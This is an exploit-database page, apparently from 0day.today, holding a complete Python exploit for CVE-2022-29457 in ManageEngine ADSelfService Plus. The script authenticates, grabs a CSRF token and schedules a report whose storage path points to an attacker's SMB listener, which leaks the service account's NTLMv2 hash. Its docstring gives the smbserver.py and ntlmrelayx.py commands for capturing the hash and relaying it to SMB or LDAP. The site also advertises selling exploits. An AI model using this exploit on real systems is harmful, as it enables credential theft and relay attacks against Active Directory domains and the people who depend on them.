0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
ManageEngine ADSelfService Plus Build 6118 - NTLMv2 Hash Exposure Exploit
Author
Risk
[Security Risk High
]0day-ID
Category
Date add
CVE
Platform
# Exploit Title: ManageEngine ADSelfService Plus Build 6118 - NTLMv2 Hash Exposure
# Exploit Author: Metin Yunus Kandemir
# Vendor Homepage: https://www.manageengine.com/
# Software Link: https://www.manageengine.com/products/self-service-password/download.html
# Details: https://docs.unsafe-inline.com/0day/multiple-manageengine-applications-critical-information-disclosure-vulnerability
# Version: ADSelfService Plus Build < 6121
# Tested against: Build 6118
# CVE: CVE-2022-29457
# !/usr/bin/python3
import argparse
import requests
import urllib3
import random
import sys
"""
1-
a)Set up SMB server to capture NTMLv2 hash.
python3 smbserver.py share . -smb2support
b)For relaying to SMB:
python3 ntlmrelayx.py -smb2support -t smb://TARGET
c)For relaying to LDAP:
python3 ntlmrelayx.py -t ldaps://TARGET
2- Fire up the exploit.
You will obtain the NTLMv2 hash of user/computer account that runs the ADSelfService in five minutes.
"""
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def get_args():
parser = argparse.ArgumentParser(
epilog="Example: exploit.py -t https://Target/ -l Listener-IP -a adselfservice -d unsafe.local -u operator1 -p operator1")
parser.add_argument('-d', '--domain', required=True, action='store', help='DNS name of the target domain. ')
parser.add_argument('-a', '--auth', required=True, action='store', help='If you have credentials of the application user, type adselfservice. If you have credentials of the domain user, type domain')
parser.add_argument('-u', '--user', required=True, action='store')
parser.add_argument('-p', '--password', required=True, action='store')
parser.add_argument('-t', '--target', required=True, action='store', help='Target url')
parser.add_argument('-l', '--listener', required=True, action='store', help='Listener IP to capture NTLMv2 hash')
args = parser.parse_args()
return args
def scheduler(domain, auth, target, listener, user, password):
try:
with requests.Session() as s:
gUrl = target
getCsrf = s.get(url=gUrl, allow_redirects=False, verify=False)
csrf = getCsrf.cookies['_zcsr_tmp']
print("[*] Csrf token: %s" % getCsrf.cookies['_zcsr_tmp'])
if auth.lower() == 'adselfservice':
auth = "ADSelfService Plus Authentication"
data = {
"loginName": user,
"domainName": auth,
"j_username": user,
"j_password": password,
"AUTHRULE_NAME": "ADAuthenticator",
"adscsrf": [csrf, csrf]
}
#Login
url = target + "j_security_check"
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0"}
req = s.post(url, data=data, headers=headers, allow_redirects=True, verify=False)
#Auth Check
url2 = target + "webclient/index.html"
req2 = s.get(url2, headers=headers, allow_redirects=False, verify=False)
if req2.status_code == 200:
print("[+] Authentication is successful.")
elif req2.status_code == 302:
print("[-] Login failed.")
sys.exit(1)
else:
print("[-] Something went wrong")
sys.exit(1)
dn = domain.split(".")
r1 = random.randint(1, 1000)
surl = target + 'ServletAPI/Reports/saveReportScheduler'
data = {
'SCHEDULE_ID':'0',
'ADMIN_STATUS':'3',
'SCHEDULE_NAME': 'enrollment' + str(r1),
'DOMAINS': '["'+ domain +'"]',
'DOMAIN_PROPS': '{"'+ domain +'":{"OBJECT_GUID":"{*}","DISTINGUISHED_NAME":"DC='+ dn[0] +',DC='+ dn[1] +'","DOMAIN_SELECTED_OUS_GROUPS":{"ou":[{"OBJECT_GUID":"{*}","DISTINGUISHED_NAME":"DC='+ dn[0] +',DC='+ dn[1] +'","NAME":"'+ domain +'"}]}}}',
'SELECTED_REPORTS': '104,105',
'SELECTED_REPORT_LIST': '[{"REPORT_CATEGORY_ID":"3","REPORT_LIST":[{"CATEGORY_ID":"3","REPORT_NAME":"adssp.reports.enroll_rep.enroll.heading","IS_EDIT":false,"SCHEDULE_ELEMENTS":[],"REPORT_ID":"104"},{"CATEGORY_ID":"3","REPORT_NAME":"adssp.common.text.non_enrolled_users","IS_EDIT":true,"SCHEDULE_ELEMENTS":[{"DEFAULT_VALUE":false,"size":"1","ELEMENT_VALUE":false,"uiText":"adssp_reports_enroll_rep_non_enroll_show_notified","name":"SHOW_NOTIFIED","id":"SHOW_NOTIFIED","TYPE":"checkbox","class":"grayfont fntFamily fntSize"}],"REPORT_ID":"105"}],"REPORT_CATEGORY_NAME":"adssp.xml.reportscategory.enrollment_reports"}]',
'SCHEDULE_TYPE': 'hourly',
'TIME_OF_DAY': '0',
'MINS_OF_HOUR': '5',
'EMAIL_ID': user +'@'+ domain,
'NOTIFY_ADMIN': 'true',
'NOTIFY_MANAGER': 'false',
'STORAGE_PATH': '\\\\' + listener + '\\share',
'FILE_FORMAT': 'HTML',
'ATTACHMENT_TYPE': 'FILE',
'ADMIN_MAIL_PRIORITY': 'Medium',
'ADMIN_MAIL_SUBJECT': 'adssp.reports.schedule_reports.mail_settings_sub',
'ADMIN_MAIL_CONTENT': 'adssp.reports.schedule_reports.mail_settings_msg_html',
'MANAGER_FILE_FORMAT': 'HTML',
'MANAGER_ATTACHMENT_TYPE': 'FILE',
'MANAGER_MAIL_SUBJECT': 'adssp.reports.schedule_reports.mail_settings_mgr_sub',
'MANAGER_MAIL_CONTENT': 'adssp.reports.schedule_reports.mail_settings_mgr_msg_html',
'adscsrf': csrf
}
sch = s.post(surl, data=data, headers=headers, allow_redirects=False, verify=False)
if 'adssp.reports.schedule_reports.storage_path.unc_storage_path' in sch.text:
print('[-] The target is patched!')
sys.exit(1)
if sch.status_code == 200:
print("[+] The report is scheduled. The NTLMv2 hash will be captured in five minutes!")
else:
print("[-] Something went wrong. Please, try it manually!")
sys.exit(1)
except:
print('[-] Connection error!')
def main():
arg = get_args()
domain = arg.domain
auth = arg.auth
user = arg.user
password = arg.password
target = arg.target
listener = arg.listener
scheduler(domain, auth, target, listener, user, password)
if __name__ == "__main__":
main()
# 0day.today [2024-11-15] #